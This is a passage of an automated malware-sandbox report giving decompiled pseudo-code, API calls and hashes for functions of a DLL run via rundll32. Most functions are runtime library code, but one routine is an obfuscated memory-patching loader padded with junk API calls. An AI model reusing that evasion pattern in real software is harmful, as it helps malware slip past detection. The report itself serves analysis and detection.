                                                                                                            0x1002616d
                                                                                                            0x1002616f
                                                                                                            0x00000000
                                                                                                            0x10026171
                                                                                                            0x10026171
                                                                                                            0x10026173
                                                                                                            0x10026174
                                                                                                            0x1002617b
                                                                                                            0x10026181
                                                                                                            0x10026185
                                                                                                            0x10026189
                                                                                                            0x10026189
                                                                                                            0x1002616f
                                                                                                            0x10026156
                                                                                                            0x10026142
                                                                                                            0x10026125
                                                                                                            0x100260d0
                                                                                                            0x10026195
                                                                                                            0x10026024
                                                                                                            0x10026024
                                                                                                            0x1002602c
                                                                                                            0x1002602c

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,100207BA,?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C,100209E4,?), ref: 10026018
                                                                                                            • __mtterm.LIBCMT ref: 10026024
                                                                                                              • Part of subcall function 10025CFC: __decode_pointer.LIBCMT ref: 10025D0D
                                                                                                              • Part of subcall function 10025CFC: TlsFree.KERNEL32(00000022,10020856,?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C,100209E4,?), ref: 10025D27
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1002603A
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10026047
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10026054
                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10026061
                                                                                                            • TlsAlloc.KERNEL32(?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C,100209E4,?), ref: 100260B1
                                                                                                            • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C,100209E4,?), ref: 100260CC
                                                                                                            • __init_pointers.LIBCMT ref: 100260D6
                                                                                                            • __encode_pointer.LIBCMT ref: 100260E1
                                                                                                            • __encode_pointer.LIBCMT ref: 100260F1
                                                                                                            • __encode_pointer.LIBCMT ref: 10026101
                                                                                                            • __encode_pointer.LIBCMT ref: 10026111
                                                                                                            • __decode_pointer.LIBCMT ref: 10026132
                                                                                                            • __calloc_crt.LIBCMT ref: 1002614B
                                                                                                            • __decode_pointer.LIBCMT ref: 10026165
                                                                                                            • __initptd.LIBCMT ref: 10026174
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 1002617B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                            • API String ID: 2657569430-3819984048
                                                                                                            • Opcode ID: 032371d8d2054dcfaa9331f682b7adc651e4b7ec3922b6df847e9872986f5f56
                                                                                                            • Instruction ID: 704b4601cb084f4dd452549cd158f7ffd0a67ac7cd9a7aed0fe10d7678a8cbb0
                                                                                                            • Opcode Fuzzy Hash: 032371d8d2054dcfaa9331f682b7adc651e4b7ec3922b6df847e9872986f5f56
                                                                                                            • Instruction Fuzzy Hash: 8631A435D02321AEF751EF74AD8490F3BE5EB56252B504926F401C72F2EB329940CF58
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001E144 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44registryclipboardCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1001E144(intOrPtr* __ecx) {
				intOrPtr* _t27;

				_t27 = __ecx;
				 *_t27 = RegisterClipboardFormatA("Native");
				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
				return _t27;
			}




                                                                                                            0x1001e151
                                                                                                            0x1001e15a
                                                                                                            0x1001e163
                                                                                                            0x1001e16d
                                                                                                            0x1001e177
                                                                                                            0x1001e181
                                                                                                            0x1001e18b
                                                                                                            0x1001e195
                                                                                                            0x1001e19f
                                                                                                            0x1001e1a9
                                                                                                            0x1001e1b3
                                                                                                            0x1001e1bd
                                                                                                            0x1001e1c2
                                                                                                            0x1001e1c9

                                                                                                            APIs
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001E153
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001E15C
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001E166
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001E170
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001E17A
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001E184
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001E18E
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001E198
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001E1A2
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001E1AC
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001E1B6
                                                                                                            • RegisterClipboardFormatA.USER32 ref: 1001E1C0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClipboardFormatRegister
                                                                                                            • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                            • API String ID: 1228543026-2889995556
                                                                                                            • Opcode ID: 0e86c2709f0b9af3b7d061cab64bc5c46ce0e33a6718d2d0bc984e8fe3a0ba64
                                                                                                            • Instruction ID: 4b9fafc3805f733a061432fadfe8ab03a294f1ea68a7cded52070413de5cc64b
                                                                                                            • Opcode Fuzzy Hash: 0e86c2709f0b9af3b7d061cab64bc5c46ce0e33a6718d2d0bc984e8fe3a0ba64
                                                                                                            • Instruction Fuzzy Hash: 600144708007949ECB32EFB69C08C8BBAE5EED57117024D6EE2858F610E778E641CF84
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000290C Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 251COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1000290C(signed int _a4, intOrPtr _a8) {
				intOrPtr _v4;
				unsigned int _v8;
				signed int _v12;
				intOrPtr _v16;
				int _v20;
				signed short* _v24;
				int _t73;
				intOrPtr* _t80;
				short* _t132;
				short* _t156;

				_t156 = L"xadqsavcbdfewescGADW";
				_t132 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v16 =  *((intOrPtr*)(_a4 + 4));
				_v20 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d4;
				_v20 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440dc + _v20;
				_t73 =  *_a4 + 0xa0 + (GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d0 + _v20) * 8;
				_v20 = _t73;
				if( *((intOrPtr*)(_t73 + 4)) != 0) {
					_a4 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) << 3;
					_t80 = (GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) + _a4) *  *0x100440d0 +  *_v20 + _v16;
					while(1) {
						_a4 = _t80;
						if( *_t80 <= 0) {
							break;
						}
						_v4 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d0 +  *_a4 + _v16;
						_v20 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440e0 + 8;
						_v24 = _v20 + GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d4 * 2 + _a4;
						_v20 = 0;
						_v12 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_a4 + 4)) - 8 >> 1;
						if(GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440e0 + _v12 == 0) {
							L7:
							_t80 = _a4 + GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440dc +  *((intOrPtr*)(_a4 + 4));
							continue;
						} else {
							goto L4;
						}
						do {
							L4:
							_v12 = ( *_v24 & 0x0000ffff) >> GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d0 + 0xc;
							_v8 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d8 + 0x00000fff &  *_v24 & 0x0000ffff;
							if(_v12 == 3) {
								_v12 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d8 << 2;
								_v8 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d4 + _v12 + _v8 + _v4;
								 *_v8 =  *_v8 + GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d0 + _a8;
							}
							_v20 = _v20 + 1;
							GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9);
							_v24 =  &(_v24[1]);
							_v8 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_a4 + 4)) - 8 >> 1;
						} while (_v20 < GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440e0 + _v8);
						goto L7;
					}
					return 1;
				}
				return 0 | _a8 == 0x00000000;
			}













                                                                                                            0x10002925
                                                                                                            0x1000292d
                                                                                                            0x1000293b
                                                                                                            0x10002954
                                                                                                            0x10002971
                                                                                                            0x10002988
                                                                                                            0x10002994
                                                                                                            0x10002998
                                                                                                            0x100029c3
                                                                                                            0x100029da
                                                                                                            0x10002bc6
                                                                                                            0x10002bc9
                                                                                                            0x10002bcd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10002a0e
                                                                                                            0x10002a2a
                                                                                                            0x10002a48
                                                                                                            0x10002a52
                                                                                                            0x10002a78
                                                                                                            0x10002a89
                                                                                                            0x10002ba6
                                                                                                            0x10002bc4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10002a8f
                                                                                                            0x10002a8f
                                                                                                            0x10002abe
                                                                                                            0x10002ade
                                                                                                            0x10002ae2
                                                                                                            0x10002b08
                                                                                                            0x10002b2d
                                                                                                            0x10002b44
                                                                                                            0x10002b44
                                                                                                            0x10002b46
                                                                                                            0x10002b56
                                                                                                            0x10002b58
                                                                                                            0x10002b8b
                                                                                                            0x10002b9c
                                                                                                            0x00000000
                                                                                                            0x10002a8f
                                                                                                            0x00000000
                                                                                                            0x10002bd5
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000293F
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002958
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002975
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100029B2
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100029C7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-3161301136
                                                                                                            • Opcode ID: 53cc18772c5c51637f45663d1903c786bbf5cef672ca4e34036eb6a9dd3be76e
                                                                                                            • Instruction ID: 79824c52bf8429aa3b3288a891149b50f2ccf3fe83c12eb32a247a59d7a1ec18
                                                                                                            • Opcode Fuzzy Hash: 53cc18772c5c51637f45663d1903c786bbf5cef672ca4e34036eb6a9dd3be76e
                                                                                                            • Instruction Fuzzy Hash: 19815971A44315BFE214DBA1CD86F1BBBECEB8AB48F01081EF7409A2D1D671A9108F65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000C177 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 92%
                                                                                                            			E1000C177(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				short _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t106;
				long* _t108;
				long _t110;
				signed int _t111;
				CHAR* _t112;
				intOrPtr _t113;
				void* _t116;
				void* _t119;
				intOrPtr _t120;

				_t119 = __eflags;
				_t105 = __edi;
				_push(0x148);
				E1001FC2D(E10033686, __ebx, __edi, __esi);
				_t110 =  *(_t116 + 0x10);
				_t94 =  *(_t116 + 0xc);
				_push(0x10004e88);
				 *(_t116 - 0x120) = _t110;
				_t54 = E10010A4A(_t94, 0x10048490, __edi, _t110, _t119);
				_t120 = _t54;
				_t97 = 0 | _t120 == 0x00000000;
				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
				_t121 = _t120 == 0;
				if(_t120 == 0) {
					_t54 = E10004E6E(_t94, _t97, __edi, _t110, _t121);
				}
				if( *(_t116 + 8) == 3) {
					_t106 =  *_t110;
					_t111 =  *(_t54 + 0x14);
					_t55 = E1000EC09(_t94, _t106, _t111, __eflags);
					__eflags = _t111;
					_t56 =  *(_t55 + 0x14) & 0x000000ff;
					 *(_t116 - 0x124) = _t56;
					if(_t111 != 0) {
						L7:
						__eflags =  *0x1004886c;
						if( *0x1004886c == 0) {
							L12:
							__eflags = _t111;
							if(__eflags == 0) {
								__eflags =  *0x1004846c;
								if( *0x1004846c != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x1004846c; // 0x0
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										__eflags = _t59;
										 *(_t116 - 0x14) = _t59;
										if(_t59 != 0) {
											_t112 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t112);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t112,  *(_t116 - 0x14));
												_t66 = GetPropA(_t94, _t112);
												__eflags = _t66 -  *(_t116 - 0x14);
												if(_t66 ==  *(_t116 - 0x14)) {
													GlobalAddAtomA(_t112);
													SetWindowLongA(_t94, 0xfffffffc, E1000C033);
												}
											}
										}
										L27:
										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
										__eflags =  *(_t116 - 0x124);
										_t110 = _t60;
										if( *(_t116 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t105 + 0x28));
											_t50 = _t105 + 0x28;
											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t113 = 0x30;
								E10020F40(_t106, _t116 - 0x154, 0, _t113);
								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
								_push(_t116 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E100093B7(_t94, _t97, _t106, "#32768", __eflags);
								__eflags = _t72;
								 *0x1004846c = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t116 - 0x19)) = 0;
									_t76 = E1002290B(_t116 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E1000EC55(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
							E1000A931(_t111, _t116, _t94);
							 *((intOrPtr*)( *_t111 + 0x50))();
							_t108 =  *((intOrPtr*)( *_t111 + 0xf0))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1000B02E);
							__eflags = _t83 - E1000B02E;
							if(_t83 != E1000B02E) {
								 *_t108 = _t83;
							}
							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
							__eflags =  *(_t116 - 0x14);
							if( *(_t116 - 0x14) != 0) {
								_push( *(_t116 - 0x18));
								_push(0);
								E1000E519();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t106 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t116 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
							_t87 = _t116 - 0x18;
						}
						_t88 = E10005CC1(_t87, "ime");
						__eflags = _t88;
						_pop(_t97);
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t106 + 0x20) & 0x40000000;
					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
					L30:
					return E1001FCB0(_t94, _t105, _t110);
				}
			}



























                                                                                                            0x1000c177
                                                                                                            0x1000c177
                                                                                                            0x1000c177
                                                                                                            0x1000c181
                                                                                                            0x1000c186
                                                                                                            0x1000c189
                                                                                                            0x1000c18c
                                                                                                            0x1000c196
                                                                                                            0x1000c19c
                                                                                                            0x1000c1a3
                                                                                                            0x1000c1a5
                                                                                                            0x1000c1a8
                                                                                                            0x1000c1ae
                                                                                                            0x1000c1b0
                                                                                                            0x1000c1b2
                                                                                                            0x1000c1b2
                                                                                                            0x1000c1bb
                                                                                                            0x1000c1d0
                                                                                                            0x1000c1d2
                                                                                                            0x1000c1d5
                                                                                                            0x1000c1da
                                                                                                            0x1000c1dc
                                                                                                            0x1000c1e0
                                                                                                            0x1000c1e6
                                                                                                            0x1000c1fd
                                                                                                            0x1000c1fd
                                                                                                            0x1000c204
                                                                                                            0x1000c251
                                                                                                            0x1000c251
                                                                                                            0x1000c253
                                                                                                            0x1000c2bb
                                                                                                            0x1000c2c3
                                                                                                            0x1000c2ff
                                                                                                            0x1000c30b
                                                                                                            0x1000c312
                                                                                                            0x1000c344
                                                                                                            0x1000c347
                                                                                                            0x1000c34d
                                                                                                            0x1000c34f
                                                                                                            0x1000c352
                                                                                                            0x1000c35a
                                                                                                            0x1000c361
                                                                                                            0x1000c363
                                                                                                            0x1000c365
                                                                                                            0x1000c36c
                                                                                                            0x1000c374
                                                                                                            0x1000c376
                                                                                                            0x1000c379
                                                                                                            0x1000c37c
                                                                                                            0x1000c38a
                                                                                                            0x1000c38a
                                                                                                            0x1000c379
                                                                                                            0x1000c365
                                                                                                            0x1000c390
                                                                                                            0x1000c396
                                                                                                            0x1000c3a2
                                                                                                            0x1000c3a8
                                                                                                            0x1000c3af
                                                                                                            0x1000c3b1
                                                                                                            0x1000c3b6
                                                                                                            0x1000c3bc
                                                                                                            0x1000c3bc
                                                                                                            0x1000c3bc
                                                                                                            0x1000c3bc
                                                                                                            0x00000000
                                                                                                            0x1000c3c0
                                                                                                            0x00000000
                                                                                                            0x1000c314
                                                                                                            0x1000c2c7
                                                                                                            0x1000c2d2
                                                                                                            0x1000c2dd
                                                                                                            0x1000c2e3
                                                                                                            0x1000c2e9
                                                                                                            0x1000c2ea
                                                                                                            0x1000c2ec
                                                                                                            0x1000c2f4
                                                                                                            0x1000c2f7
                                                                                                            0x1000c2fd
                                                                                                            0x1000c323
                                                                                                            0x1000c329
                                                                                                            0x1000c32b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c335
                                                                                                            0x1000c339
                                                                                                            0x1000c33e
                                                                                                            0x1000c342
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c342
                                                                                                            0x00000000
                                                                                                            0x1000c2fd
                                                                                                            0x1000c25b
                                                                                                            0x1000c260
                                                                                                            0x1000c267
                                                                                                            0x1000c270
                                                                                                            0x1000c286
                                                                                                            0x1000c288
                                                                                                            0x1000c28e
                                                                                                            0x1000c290
                                                                                                            0x1000c292
                                                                                                            0x1000c292
                                                                                                            0x1000c29a
                                                                                                            0x1000c29e
                                                                                                            0x1000c2a2
                                                                                                            0x1000c2a6
                                                                                                            0x1000c2ac
                                                                                                            0x1000c2af
                                                                                                            0x1000c2b1
                                                                                                            0x1000c2b1
                                                                                                            0x00000000
                                                                                                            0x1000c2a6
                                                                                                            0x1000c209
                                                                                                            0x1000c20f
                                                                                                            0x1000c214
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c21a
                                                                                                            0x1000c21d
                                                                                                            0x1000c222
                                                                                                            0x1000c22f
                                                                                                            0x1000c233
                                                                                                            0x1000c239
                                                                                                            0x1000c239
                                                                                                            0x1000c242
                                                                                                            0x1000c247
                                                                                                            0x1000c24a
                                                                                                            0x1000c24b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c24b
                                                                                                            0x1000c1e8
                                                                                                            0x1000c1ef
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c1f5
                                                                                                            0x1000c1f7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c1bd
                                                                                                            0x1000c1c5
                                                                                                            0x1000c3c2
                                                                                                            0x1000c3c7
                                                                                                            0x1000c3c7

                                                                                                            APIs
                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 1000C181
                                                                                                              • Part of subcall function 10010A4A: __EH_prolog3.LIBCMT ref: 10010A51
                                                                                                            • CallNextHookEx.USER32 ref: 1000C1C5
                                                                                                              • Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
                                                                                                              • Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F
                                                                                                            • GetClassLongA.USER32 ref: 1000C209
                                                                                                            • GlobalGetAtomNameA.KERNEL32 ref: 1000C233
                                                                                                            • SetWindowLongA.USER32 ref: 1000C288
                                                                                                            • _memset.LIBCMT ref: 1000C2D2
                                                                                                            • GetClassLongA.USER32 ref: 1000C302
                                                                                                            • GetClassNameA.USER32(?,?,00000100), ref: 1000C323
                                                                                                            • GetWindowLongA.USER32 ref: 1000C347
                                                                                                            • GetPropA.USER32 ref: 1000C361
                                                                                                            • SetPropA.USER32 ref: 1000C36C
                                                                                                            • GetPropA.USER32 ref: 1000C374
                                                                                                            • GlobalAddAtomA.KERNEL32 ref: 1000C37C
                                                                                                            • SetWindowLongA.USER32 ref: 1000C38A
                                                                                                            • CallNextHookEx.USER32 ref: 1000C3A2
                                                                                                            • UnhookWindowsHookEx.USER32(?), ref: 1000C3B6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
                                                                                                            • String ID: #32768$AfxOldWndProc423$ime
                                                                                                            • API String ID: 1191297049-4034971020
